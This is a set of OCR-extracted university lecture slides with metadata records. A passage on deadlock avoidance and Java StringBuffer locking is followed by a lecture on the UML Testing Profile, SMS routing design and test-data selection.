dependencies with cycles bad Deadlock avoidance in programming amounts to techniques to ensure a cycle can never arise Back to our example Options for deadlock-proof transfer: 1. Make a smaller critical section: `transferTo` not synchronized - Exposes intermediate state after `withdraw` before `deposit` - May be okay here, but exposes wrong total amount in bank 2. Coarsen lock granularity: one lock for all accounts allowing transfers between them - Works, but sacrifices concurrent deposits/withdrawals 3. Give every bank-account a unique number and always acquire locks in the same order - *Entire program* should obey this order to avoid cycles - Code acquiring only one lock can ignore the order class BankAccount { ... private int acctNumber; // must be unique void transferTo(int amt, BankAccount a) { if (this.acctNumber < a.acctNumber) { synchronized(this) { synchronized(a) { this.withdraw(amt); a.deposit(amt); } } } else { synchronized(a) { synchronized(this) { this.withdraw(amt); a.deposit(amt); } } } } } Aside: Another example StringBuffer From the Java standard library class StringBuffer { private int count; private char[] value; ... synchronized append(StringBuffer sb) { int len = sb.length(); if(this.count + len > this.value.length) this.expand(...); sb.getChars(0, len, this.value, this.count); } synchronized getChars(int x, int y, char[] a, int z) { "copy this.value[x..y] into a starting at z" } } Aside: Two problems with StringBuffer Problem #1: Lock for sb is not held between calls to sb.length and sb.getChars – So sb could get longer – Would cause append to throw an ArrayBoundsException Problem #2: Deadlock potential if two threads try to append in opposite directions, just like in the bank-account first example Not easy to fix both problems without extra copying: – Do not want unique ids on every StringBuffer – Do not want one lock for all StringBuffer objects Actual Java library: fixed neither (left code as is; changed javadoc) – Up to clients to avoid such situations with own protocols Perspective • Code like account-transfer and string-buffer append are difficult to deal with for deadlock • Easier case: different types of objects – Can document a fixed order among types – Example: “When moving an item from the hashtable to the work queue, never try to acquire the queue lock while holding the hashtable lock” • Easier case: objects are in an acyclic structure – Can use the data structure to determine a fixed order – Example: “If holding a tree node’s lock, do not acquire other tree nodes’ locks unless they are children in the tree” Concurrency summary - Concurrent programming allows multiple threads to access shared resources (e.g., hash table, work queue) - Introduces new kinds of bugs: - Data races and Bad Interleavings - Critical sections too small - Critical sections use wrong locks - Deadlocks - Requires synchronization - Locks for mutual exclusion (common, various flavors) - Other Synchronization Primitives: (see Grossman notes) - Reader/Writer Locks - Condition variables for signaling others - Guidelines for correct use help avoid common pitfalls - Shared Memory model is not only approach, but other approaches (e.g., message passing) are not painless
{"Source-Url": "https://courses.cs.washington.edu/courses/cse332/18au/lectures/cse332-18au-lec18-Concurrency-2.pdf", "len_cl100k_base": 4767, "olmocr-version": "0.1.53", "pdf-total-pages": 46, "total-fallback-pages": 0, "total-input-tokens": 68584, "total-output-tokens": 6664, "length": "2e12", "weborganizer": {"__label__adult": 0.0003724098205566406, "__label__art_design": 0.0002980232238769531, "__label__crime_law": 0.0004410743713378906, "__label__education_jobs": 0.0024318695068359375, "__label__entertainment": 6.127357482910156e-05, "__label__fashion_beauty": 0.0001348257064819336, "__label__finance_business": 0.00013399124145507812, "__label__food_dining": 0.0004189014434814453, "__label__games": 0.0006284713745117188, "__label__hardware": 0.0006527900695800781, "__label__health": 0.00045108795166015625, "__label__history": 0.00024306774139404297, "__label__home_hobbies": 0.0001067519187927246, "__label__industrial": 0.0004508495330810547, "__label__literature": 0.00025200843811035156, "__label__politics": 0.00033783912658691406, "__label__religion": 0.0006237030029296875, "__label__science_tech": 0.00722503662109375, "__label__social_life": 0.00012993812561035156, "__label__software": 0.0030384063720703125, "__label__software_dev": 0.97998046875, "__label__sports_fitness": 0.0004546642303466797, "__label__transportation": 0.0007233619689941406, "__label__travel": 0.0002359151840209961}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20199, 0.00586]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20199, 0.5701]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20199, 0.8412]], "google_gemma-3-12b-it_contains_pii": [[0, 105, false], [105, 430, null], [430, 1117, null], [1117, 1398, null], [1398, 1985, null], [1985, 2383, null], [2383, 2798, null], [2798, 3165, null], [3165, 3722, null], [3722, 4011, null], [4011, 4246, null], [4246, 4508, null], [4508, 4813, null], [4813, 5528, null], [5528, 5850, null], [5850, 6257, null], [6257, 6896, null], [6896, 7400, null], [7400, 7971, null], [7971, 8274, null], [8274, 8838, null], [8838, 9291, null], [9291, 9803, null], [9803, 10382, null], [10382, 11135, null], [11135, 11527, null], [11527, 12110, null], [12110, 12487, null], [12487, 12717, null], [12717, 13107, null], [13107, 13436, null], [13436, 13931, null], [13931, 14425, null], [14425, 14978, null], [14978, 14987, null], [14987, 15378, null], [15378, 15831, null], [15831, 16106, null], [16106, 16416, null], [16416, 16832, null], [16832, 17435, null], [17435, 17870, null], [17870, 18349, null], [18349, 18974, null], [18974, 19541, null], [19541, 20199, null]], "google_gemma-3-12b-it_is_public_document": [[0, 105, true], [105, 430, null], [430, 1117, null], [1117, 1398, null], [1398, 1985, null], [1985, 2383, null], [2383, 2798, null], [2798, 3165, null], [3165, 3722, null], [3722, 4011, null], [4011, 4246, null], [4246, 4508, null], [4508, 4813, null], [4813, 5528, null], [5528, 5850, null], [5850, 6257, null], [6257, 6896, null], [6896, 7400, null], [7400, 7971, null], [7971, 8274, null], [8274, 8838, null], [8838, 9291, null], [9291, 9803, null], [9803, 10382, null], [10382, 11135, null], [11135, 11527, null], [11527, 12110, null], [12110, 12487, null], [12487, 12717, null], [12717, 13107, null], [13107, 13436, null], [13436, 13931, null], [13931, 14425, null], [14425, 14978, null], [14978, 14987, null], [14987, 15378, null], [15378, 15831, null], [15831, 16106, null], [16106, 16416, null], [16416, 16832, null], [16832, 17435, null], [17435, 17870, null], [17870, 18349, null], [18349, 18974, null], [18974, 19541, null], [19541, 20199, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20199, null]], "pdf_page_numbers": [[0, 105, 1], [105, 430, 2], [430, 1117, 3], [1117, 1398, 4], [1398, 1985, 5], [1985, 2383, 6], [2383, 2798, 7], [2798, 3165, 8], [3165, 3722, 9], [3722, 4011, 10], [4011, 4246, 11], [4246, 4508, 12], [4508, 4813, 13], [4813, 5528, 14], [5528, 5850, 15], [5850, 6257, 16], [6257, 6896, 17], [6896, 7400, 18], [7400, 7971, 19], [7971, 8274, 20], [8274, 8838, 21], [8838, 9291, 22], [9291, 9803, 23], [9803, 10382, 24], [10382, 11135, 25], [11135, 11527, 26], [11527, 12110, 27], [12110, 12487, 28], [12487, 12717, 29], [12717, 13107, 30], [13107, 13436, 31], [13436, 13931, 32], [13931, 14425, 33], [14425, 14978, 34], [14978, 14987, 35], [14987, 15378, 36], [15378, 15831, 37], [15831, 16106, 38], [16106, 16416, 39], [16416, 16832, 40], [16832, 17435, 41], [17435, 17870, 42], [17870, 18349, 43], [18349, 18974, 44], [18974, 19541, 45], [19541, 20199, 46]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20199, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
5ba8dbfa75861dcdc09a353f029474ccc0f1e372
More Testing with U2TP ... and more on routing ... and a few other things Version 091113 ICU 6-9 Testing is … - A technical process - Performed by experimenting with a system - In a controlled environment following a specified procedure - With the intent of observing one or more characteristics of the system - By demonstrating the deviation of the system’s actual status from the required status/specification. Buzz 1: Why Model-driven Testing? - Spend 2 minutes with one person beside you - List reasons in favor and against model-driven testing - write your reasons down on a piece of paper - we shall come back to your reasons somewhat later - This will probably reveal your prejudices of what model-driven testing is and can be used for Types of Testing <table> <thead> <tr> <th>Level</th> <th>Accessibility</th> </tr> </thead> <tbody> <tr> <td>unit</td> <td></td> </tr> <tr> <td>white box</td> <td></td> </tr> <tr> <td>black box</td> <td></td> </tr> <tr> <td>grey box</td> <td></td> </tr> <tr> <td>white box</td> <td></td> </tr> </tbody> </table> - acceptance - integration - functionality - load/performance - robustness - interoperability - usability - ... UML Testing Profile - To allow **black-box testing** (i.e. at UML interfaces) of computational models in UML - A testing profile based upon UML 2.0 - That enables the **test definition and test generation** based on structural (static) and behavioral (dynamic) aspects of UML models, and - That is capable of **inter-operation with existing test technologies** for black-box testing - Standardized profile recommended by OMG Model-Driven Testing Model-driven development has become the most important new paradigm in software development and has already demonstrated considerable impact in reducing time-to-market and improving product quality. However, the development of high-quality systems still relies on the more traditional development processes and also systematic test processes. This book is about systematic, model-driven test processes in the context of UML. As a UML profile, provides a consistent view of the design and development of test artifacts, a concept that was formed by the Object Management Group (OMG) to develop a UML profile for model-driven testing – the UML Testing Profile (UTP), an OMG standard from 2005. Written by the original members of the standardization group, this book shows you how to test thanks to comprehensive concepts. The authors introduce UTP step-by-step, using a case study that illustrates how UTP can be used for test-driven design and development. They also prove UTP concepts can be used for functional and non-functional testing with example applications and test suites for better comprehension and easy practical application to different systems. The authors demonstrate how to apply UTP using framework tools TBB 3.0 and the UML test framework in UML. This book is the definitive reference for the only UML-based test specification language, written by the creators of that language. It is supported by an Internet site that provides information on the latest tools and support of the profile. Features & Benefits - Learn how to create and use model-driven testing processes - Use a step-by-step methodology to develop the UML Testing Profile for your organization - Experience test-driven design in the use of UML for different perspectives of testing - Understand the automated generation of UML-based tests with testing tool frameworks like TBB 3.0 and TBB 4.0 - Find additional material at: model-driven.org Test Concepts: Black-Box Testing Test Context Test Case Stimulus Response Port System Under Test (SUT) • Assignment of a Test Verdict Test Execution Test Context - Test Case - Stimulus - Response - Assignment of a Test Verdict System Under Test (SUT) - Port Test Harness / Test execution platform - machine-based or human-based Compilation Human interpretation Unit Level Testing - For unit level testing, the SUT is the smallest unit, e.g. a class or an operation, which is to be tested. System and Acceptance Level Testing - The goal of system level testing is to verify that the system under test conforms to its requirements. - Acceptance testing is basically an extension of system testing in which requirements and the test cases associated with validating them are developed by or with the customer(s) and are considered to be contractual descriptions of the required system behavior. ICU5 system test context - Test case - Test component - System Under Test - Test configuration **Test case** - `testHotpos ()` - `testHotpos_fail ()` - `testHotpos_inconcr ()` **Test component** - `Oystein : CellPhone` - `Trine : CellPhone` **System Under Test** - `ICUTestPackage` - `ICU` **Test configuration** - `SMSin : SmsInputMediator = ARG5[0], ARG5[0]` - `SMSout : SmsOutputMediator = ARG5[0], ARG5[0]` **Test package imports def of system** - `ICUTestPackage` Test control problems How to enforce the desired sequence? Verdict? Verdict Verdict Verdict Arbitration (1) Arbitration (2) - One *fail* is normally enough to force a *fail* test case - *pass, inconclusive, fail* is ordered such that the least value is the final resulting verdict - Arbitration can also be defined by the user - possibly one single *fail* should not suffice to force a full failure Arbitration (3) When to determine this Verdict? There is just no response for Trine’s Sms stimulus Verdict Verdict? Test strategy – acceptance test - validate that the functionality of the system is correct with respect to the requirements - validate the non-functional (extra-functional) properties - Performance testing - to see if a system can meet its expected response times under typical workloads. - Load testing - to determine whether the system suffers from resource problems (memory leaks, buffer problems) or otherwise undergoes degradation - Stress testing - to determine how gracefully it may recover from extreme situations - Reliability - the probability of correct operation of a piece of software for a specified amount of time. - validate that the supported software distribution and deployment configurations are correctly supported Buzz 2: Testing strategy – advanced tests (Buzz 5 min) - Challenges - How to test systems that have non-deterministic behavior? - due to concurrency - How to test time requirements - test probes changes the timing of the system - How to simulate extreme load situations - 1 million SMS-messages within a minute Dynamic Data (still transient) Signal hierarchies Combined Fragments of Sequence Diagram Register users Associate the nickname "haugen" with the static id "STAT-ID" decompose for detailed specification combined fragment: alternative even though we may describe alternative execution traces, we are not obliged to describe them all! Register users - decomposition extra-global combined fragment: alternative more signals defined by the designer Effect on routing (1) common abstract signal with routing info Effect on routing (2) - **Type of signal** - ![Diagram of signal types with routing information](image) - **Effect on routing** - Abstract signal with routing info - **Code snippet** ```java /* Sms */ String string = ((Sms)(sig)).getFrom(); /* PostResult */ String string = ((PostResult)(sig)).getPostResult(); int i = the_string.indexOf("<STATICID="); string = the_string.substring(i, i+18); /* InternalSignal */ String string = ((InternalSignal)(sig)).static_id; for (int i = 0; i < mediator.size(); i++) { if (string.equals(mediator.get(i))) ((Mediator)mediator.get(i)).forward(sig); } ``` Repeating our simple composite structure ``` ICU_system SMS_in : SmsInputMediator = ARG[0], ARG[1] contr : ICUcontroller from_dataproc to_ICUproc : SimpleIDRouter icu_proc : ICUprocess [*] to_dataproc from_ICUproc SMS_out : SmsOutputMediator = ARG[0], ARG[1] dataproc : Archive to_contr ``` the receptionist the sessions the data Adding a new service is no sweat! just add another submachine state The new state machine significant work is left to the Archive process The Archive process enhanced our new input to the Archive Check registration transition - If the static ID already exists: - Check if static ID already exists. - If it exists, send our own defined message about it. - Include the new user in table. - If the nickname already exists: - Check if nickname already exists. - If it exists, send our own defined message about it. - Include the new user in table. - If no static ID or nickname exists, register the user. Write down the names of these UML concepts a) Interaction [Frame, Sequence Diagram] b) Lifeline c) Combined fragment [alt-fragment] d) Message e) Gate Check consistency with spec! Summary of adding the *reg* service - Specify what the new service is supposed to do - use case in prose - sequence diagrams on context and detailed levels - Define necessary internal signals - make sure routing will be performed properly - Define a new submachine state in the session process - Define the corresponding state machine - this may involve the data process - add new transitions with new data operations - Notice that the old system is hardly changed! - there are only additions - Check the consistency between specification and design On Routing - and a few other lessons Lessons to be learned now - Small changes to the user’s specification may result in rather far reaching effects on the software - 3rd party software interface can be quite important - Routing can be done several ways - Agile modeling normally involves re-engineering – that sometimes may become rather fundamental Hotpos – as of ICU6 - Only ask `hotpos` - Returning the position of the user relative to the hotspots Hotpos – as of ICU7 – a minor change? - Only hotpos is as before - **hotpos nickname** should give the position of the person registered with the nickname relative to the users hotspots - What could possibly be the problem? - Let us look at the decomposition! Need STAT-ID for routing! Static id of the user Static id of the buddy STAT-TR Routing PosResult in ICU6 ```java /* Sms */ static= ((Sms) sig).getFrom(); /* PosResult */ String the_string = ((PosResult) sig).getPositiningResult(); int ix = the_string.indexOf("<STATICID>"); static = the_string.substring(ix+10, ix+13); ``` Static id of the GSM having been positioned The problem - We want PosResult to be routed according to STAT-ID - STAT-ID is the static id of the user which identifies the session - PosResult returns an XML-string which includes the static id of the positioned GSM - which is no longer identical to the user! - PosResult is a message not defined by you, but in principle by a third party - which means you cannot change the interface! - We need to take a closer look at the SMSMediator interface! PosResult – the javadoc (1/2) smmediators Class PosResult java.lang.object se.ericsson.eto.norarc.javframe.Message smmediators.PosResult All Implemented Interfaces: java.lang.Cloneable public class PosResult extends se.ericsson.eto.norarc.javframe.Message Description: Object representing a Positioning result Field Summary Fields inherited from class se.ericsson.eto.norarc.javframe.Message nextMessage Constructor Summary PosResult (java.lang.String positioningResult, java.lang.String messageId) Constructor for positioning requests we have used this could we benefit from this? PosResult – the javadoc (2/2) Constructor Detail PosResult ``` public PosResult(String positioningResult, String messageId) ``` Constructor for positioning requests **Parameters:** - `positioningResult`: the phone/person you want to locate - `messageId`: a unique identifier for the message Method Detail **getMessageId** ``` public String getMessageId() ``` **Returns:** - Returns the messageId. **setMessageId** ``` public void setMessageId(String messageId) ``` **Parameters:** - `messageId`: The messageId to set. Exploring the SMSMediator interface - When the documentation is less than satisfactory (and it always is), one has to experiment with the interface. - We hypothesize that PATS have had the same need to tag the communication as we have: - thus we hope that the `msgageld` of `PosRequest` (that we can choose) is returned as the `msgageld` of the corresponding `PosResult`. - Through experimentation we assert that this is indeed the case! Hotpos submachine Adapted forward doing the routing session id is now very readily available More on the problems of routing ... just to get a feeling for what is normally behind the scenes The receptionist-session-archive architecture The routing domain explicitly connects to the sessions, which connect to the router and the data. Specifically: - The router is connected to the routing domain. - The data is connected to the router through `to_contr`. - The sessions are connected to the router through `to_icuproc`. - The sessions explicitly connect to the singular archive. The diagram illustrates the connections and flows between the router, sessions, data, and the ICU system. Our architecture’s routing strategy - Local addressing within the routing domain - in fact each process may only send to its own outward ports - the routing domain sets up the connections - Explicit connection to either singular parts or port, or to the (single) router - In ICU we connect to - `contr:ICUcontroller` which is the router (and a singular part) - `dataproc:Archive` which is a singular part - `SMOut:SmsOutputMediator` which is a singular port - Routing may take into account any information - but it is quite normal that the routing is done on a table where an identifier is mapped to an address - the address in our case is a port Alternative 1: The global address space - A global address space means that for the whole system - any process (or its ports) has a unique address - any such address can be reached - This is similar to the web and its URL - This presumes that - there is an underlying system of routing - with the effect that logically there is a connection between any two processes of the whole system Alternative 1: The global routing table **ICI system** - SMSin : SmsInputMediator = ARG[0], ARG[0] - SMSout : SmsOutputMediator = ARG[0], ARG[0] - from_contr : ICUcontroller - to_icuproc : StaticIDRouter - from_icuproc - to_dataproc : Dataproc : Archive Alternative 2: Multicast / broadcast Multicast meditator – sending to all in icuprocs set Another multicast port Comparison - **Alt 0: Local addressing** - local logic – but more logic through explicit connections - easy to make several instantiations - possible bottleneck at the router - **Alt 1: Global addressing** - simple logic, especially when returning answers - requires underlying routing system - more global reasoning which may mean more difficult distribution - **Alt 2: Multicast / broadcast** - no routing, the process decides for each message - simple communication - each process does a lot of futile work, but this may not be important if there are enough concurrent resources available Agile modeling and session identifier - We have used Static Id as our session identifier - This meant that the same GSM may not invoke more than one session at any point in time - Not a very tough restriction, but unnecessary and cumbersome to check - We chose Static Id as session identifier - since it was the easiest choice from a system where there were no sessions - we had not discovered the augmented features of the SMSPorts - It is typical for incremental development that - early decisions must be reviewed in light of new findings - and the system re-engineered - Here we may choose to go for unique session numbers Even More Testing with U2TP - Focusing on describing test data - what data to test Testing again – focusing on data - How to describe test data - wildcards - data pools, data partitions and data selectors - Principles for selecting data - Equivalence Class Partitioning - Boundary Value Analysis - Classification Tree Method - Preamble and Postamble Wildcards (1) – symbolic values Symbolic value The same value Another value Wildcards (2) – explaining symbolic values - Symbolic values are the same as an instance with a wildcard value - String STAT-ID = * - where the asterisk designates that the value itself is of no importance - String STAT-TR = * - another string value (not necessarily distinct from STAT-ID) - We could also have said: - Sms(message="Stud1 konto oysteinh hotpos",to="2034",from=*): - again where the asterisk designates "whatever value" - the disadvantage is that now we cannot easily refer to that value later - Sms("Stud1 konto oysteinh hotpos",2034,A-CGHDWQ): - this becomes almost too concrete with little to gain Testing registration - **sd testReg** - **TestComponent** - Oystein : CellPhone - **SUT** - icusystem : ICU system - "Oystein" is not a registered nickname. - STAT-ID is not a registered static id. - Sms("Stud1: konto oystein reg Oystein",2034,STAT-ID) - Sms("Reg: you are registered as Oystein",STAT-ID,2034) - {pass} - **sd testReg2** - **TestComponent** - Trine : CellPhone - **SUT** - icusystem : ICU system - "Oystein" is a registered nickname. - Sms("Stud1: konto oystein reg Oystein",2034,STAT-TR) - Sms("Reg: Nickname Oystein is already used",STAT-TR,2034) - {pass} - **sd testReg3** - **TestComponent** - Oystein : CellPhone - **SUT** - icusystem : ICU system - STAT-ID is a registered static id. - Sms("Stud1: konto oystein reg Haugen",2034,STAT-ID) - Sms("Reg: you are already registered as Oystein",STAT-ID,2034) - {pass} We need a pool of users - We need a data pool of users - where some have new nicknames and static id - some have old nicknames and new static id - some have new nicknames and old static id - some have old nicknames and old static id <table> <thead> <tr> <th>instance</th> <th>nickname</th> <th>static id</th> </tr> </thead> <tbody> <tr> <td>Oystein</td> <td>Oystein</td> <td>STAT-ID</td> </tr> <tr> <td>Trine</td> <td>Trine</td> <td>STAT-TR</td> </tr> <tr> <td>Sverre</td> <td>Sverre</td> <td>STAT-SV</td> </tr> <tr> <td>Sigurd</td> <td>Sigurd</td> <td>STAT-FS</td> </tr> </tbody> </table> How to define a data pool of Users - Dividing the user cellphones in partitions based on Nickname - This operation magically chooses from a partition The whole pool Equivalence Class Partitioning - Equivalence partitioning is based on the premise that - the inputs and outputs of a component can be partitioned into partitions that, according to the component's specification, will be treated similarly by the component. - Thus the result of testing a single value from an equivalence partition is considered representative of the complete partition - In ICU: - provided neither Oystein nor Trine has ever registered, it is of no concern which of the two users are applied for the test of registration Boundary Value Analysis - Boundary Value Analysis is based on the following premise. - Firstly, that the inputs and outputs of a component can be partitioned into partitions that, according to the component's specification, will be treated similarly by the component and, - Secondly, that developers are prone to making errors in their treatment of the boundaries of these classes. - Thus test cases are generated to exercise these boundaries. - In ICU: - There are no boundaries to name spaces - For Hotpos, the problems should occur where the distances to several hotspots are the same Classification Tree Method - As for classification-tree method, the input domain of a test object is regarded under various aspects assessed as relevant for the test. - For each aspect, disjoint and complete classifications are formed. - Classes resulting from these classifications may be further classified – even recursively. - The stepwise partition of the input domain by means of classifications is represented graphically in the form of a tree. Testing registration <sut> Oystein : CellPhone {"Oystein" is a registered nickname} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: Nickname Oystein is already used",STAT-TR,2034) {pass} </sut> <sut> Oystein : CellPhone {"Oystein" is not a registered nickname} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: you are registered as Oystein",STAT-ID,2034) {pass} </sut> <sut> Oystein : CellPhone {"STAT-ID" is not a registered static ID} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: you are already registered as Oystein",STAT-ID,2034) {pass} </sut> ICU registration classification tree Registration nickname - exists - new static id of sender - exists - new testReg testReg2 testReg3 Preamble and Postamble - A test preamble is a description of how to get the test system into a situation where the next test can be executed - A test postamble is a description of how to clean-up after the test - A combined test may often be done such that the tests normally make up each others preamble - TestReg will make CellPhone(Oystein,STAT-ID) registered - TestReg2 or TestReg3 have then their preconditions satisfied hotpos [nickname] ICU *hotpos* classification tree ``` hotpos nick / \ | | | | nickname static id of sender exists new exists new ``` error sms (?) normal error sms **Is this intended?** Unintended cases: the positioning stranger - The systematic testing reveals: - A complete stranger may position any one registered as long as he/she knows their nickname - What was the real intention behind registration? - That the ones inside can see others inside - Not that anybody can see the insiders and nobody can see the outsiders! - Remedy: Only registered users can position others - Systematic testing reveals - not only errors in the design and the implementation - but also problems with the requirements - there were inconclusive traces that should have been negative Summary Data-oriented Testing - Not every possible data combination can be tested - Therefore we need to group the data - such that the values in a group can be considered equal - Apply analysis to form the value groups - Equivalence Class Partitioning - Boundary Value Analysis - Classification Tree Method - Any systematic approach will be better than nothing! - UML Testing Profile offers the following concepts: - Data Pool - Data Partition - Data Selector
{"Source-Url": "https://www.uio.no/studier/emner/matnat/ifi/INF5150/h09/undervisningsmateriale/infuit-modeling4-091113.pdf", "len_cl100k_base": 5473, "olmocr-version": "0.1.50", "pdf-total-pages": 69, "total-fallback-pages": 0, "total-input-tokens": 87217, "total-output-tokens": 8033, "length": "2e12", "weborganizer": {"__label__adult": 0.00036263465881347656, "__label__art_design": 0.00032329559326171875, "__label__crime_law": 0.00023508071899414065, "__label__education_jobs": 0.0008597373962402344, "__label__entertainment": 5.269050598144531e-05, "__label__fashion_beauty": 0.00013387203216552734, "__label__finance_business": 0.00013267993927001953, "__label__food_dining": 0.00023758411407470703, "__label__games": 0.0005812644958496094, "__label__hardware": 0.0004839897155761719, "__label__health": 0.0002944469451904297, "__label__history": 0.00014603137969970703, "__label__home_hobbies": 5.924701690673828e-05, "__label__industrial": 0.0002474784851074219, "__label__literature": 0.0002982616424560547, "__label__politics": 0.00015485286712646484, "__label__religion": 0.00038695335388183594, "__label__science_tech": 0.004779815673828125, "__label__social_life": 9.429454803466796e-05, "__label__software": 0.00457000732421875, "__label__software_dev": 0.98486328125, "__label__sports_fitness": 0.00028634071350097656, "__label__transportation": 0.0003390312194824219, "__label__travel": 0.00017821788787841797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22686, 0.00746]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22686, 0.41651]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22686, 0.82865]], "google_gemma-3-12b-it_contains_pii": [[0, 98, false], [98, 415, null], [415, 750, null], [750, 1119, null], [1119, 1650, null], [1650, 3602, null], [3602, 3743, null], [3743, 3983, null], [3983, 4112, null], [4112, 4516, null], [4516, 4991, null], [4991, 5088, null], [5088, 5104, null], [5104, 5400, null], [5400, 5520, null], [5520, 6281, null], [6281, 6611, null], [6611, 6700, null], [6700, 6947, null], [6947, 7061, null], [7061, 7061, null], [7061, 7125, null], [7125, 7774, null], [7774, 8133, null], [8133, 8202, null], [8202, 8273, null], [8273, 8332, null], [8332, 8752, null], [8752, 8904, null], [8904, 8933, null], [8933, 9498, null], [9498, 9535, null], [9535, 9852, null], [9852, 9955, null], [9955, 10216, null], [10216, 10298, null], [10298, 10589, null], [10589, 11048, null], [11048, 11646, null], [11646, 12176, null], [12176, 12617, null], [12617, 12617, null], [12617, 12635, null], [12635, 12711, null], [12711, 12809, null], [12809, 13307, null], [13307, 13981, null], [13981, 14377, null], [14377, 14633, null], [14633, 14748, null], [14748, 15361, null], [15361, 16005, null], [16005, 16088, null], [16088, 16368, null], [16368, 16447, null], [16447, 17093, null], [17093, 17992, null], [17992, 18451, null], [18451, 18618, null], [18618, 19162, null], [19162, 19759, null], [19759, 20217, null], [20217, 20828, null], [20828, 20969, null], [20969, 21400, null], [21400, 21418, null], [21418, 21610, null], [21610, 22211, null], [22211, 22686, null]], "google_gemma-3-12b-it_is_public_document": [[0, 98, true], [98, 415, null], [415, 750, null], [750, 1119, null], [1119, 1650, null], [1650, 3602, null], [3602, 3743, null], [3743, 3983, null], [3983, 4112, null], [4112, 4516, null], [4516, 4991, null], [4991, 5088, null], [5088, 5104, null], [5104, 5400, null], [5400, 5520, null], [5520, 6281, null], [6281, 6611, null], [6611, 6700, null], [6700, 6947, null], [6947, 7061, null], [7061, 7061, null], [7061, 7125, null], [7125, 7774, null], [7774, 8133, null], [8133, 8202, null], [8202, 8273, null], [8273, 8332, null], [8332, 8752, null], [8752, 8904, null], [8904, 8933, null], [8933, 9498, null], [9498, 9535, null], [9535, 9852, null], [9852, 9955, null], [9955, 10216, null], [10216, 10298, null], [10298, 10589, null], [10589, 11048, null], [11048, 11646, null], [11646, 12176, null], [12176, 12617, null], [12617, 12617, null], [12617, 12635, null], [12635, 12711, null], [12711, 12809, null], [12809, 13307, null], [13307, 13981, null], [13981, 14377, null], [14377, 14633, null], [14633, 14748, null], [14748, 15361, null], [15361, 16005, null], [16005, 16088, null], [16088, 16368, null], [16368, 16447, null], [16447, 17093, null], [17093, 17992, null], [17992, 18451, null], [18451, 18618, null], [18618, 19162, null], [19162, 19759, null], [19759, 20217, null], [20217, 20828, null], [20828, 20969, null], [20969, 21400, null], [21400, 21418, null], [21418, 21610, null], [21610, 22211, null], [22211, 22686, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, true], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22686, null]], "pdf_page_numbers": [[0, 98, 1], [98, 415, 2], [415, 750, 3], [750, 1119, 4], [1119, 1650, 5], [1650, 3602, 6], [3602, 3743, 7], [3743, 3983, 8], [3983, 4112, 9], [4112, 4516, 10], [4516, 4991, 11], [4991, 5088, 12], [5088, 5104, 13], [5104, 5400, 14], [5400, 5520, 15], [5520, 6281, 16], [6281, 6611, 17], [6611, 6700, 18], [6700, 6947, 19], [6947, 7061, 20], [7061, 7061, 21], [7061, 7125, 22], [7125, 7774, 23], [7774, 8133, 24], [8133, 8202, 25], [8202, 8273, 26], [8273, 8332, 27], [8332, 8752, 28], [8752, 8904, 29], [8904, 8933, 30], [8933, 9498, 31], [9498, 9535, 32], [9535, 9852, 33], [9852, 9955, 34], [9955, 10216, 35], [10216, 10298, 36], [10298, 10589, 37], [10589, 11048, 38], [11048, 11646, 39], [11646, 12176, 40], [12176, 12617, 41], [12617, 12617, 42], [12617, 12635, 43], [12635, 12711, 44], [12711, 12809, 45], [12809, 13307, 46], [13307, 13981, 47], [13981, 14377, 48], [14377, 14633, 49], [14633, 14748, 50], [14748, 15361, 51], [15361, 16005, 52], [16005, 16088, 53], [16088, 16368, 54], [16368, 16447, 55], [16447, 17093, 56], [17093, 17992, 57], [17992, 18451, 58], [18451, 18618, 59], [18618, 19162, 60], [19162, 19759, 61], [19759, 20217, 62], [20217, 20828, 63], [20828, 20969, 64], [20969, 21400, 65], [21400, 21418, 66], [21418, 21610, 67], [21610, 22211, 68], [22211, 22686, 69]], 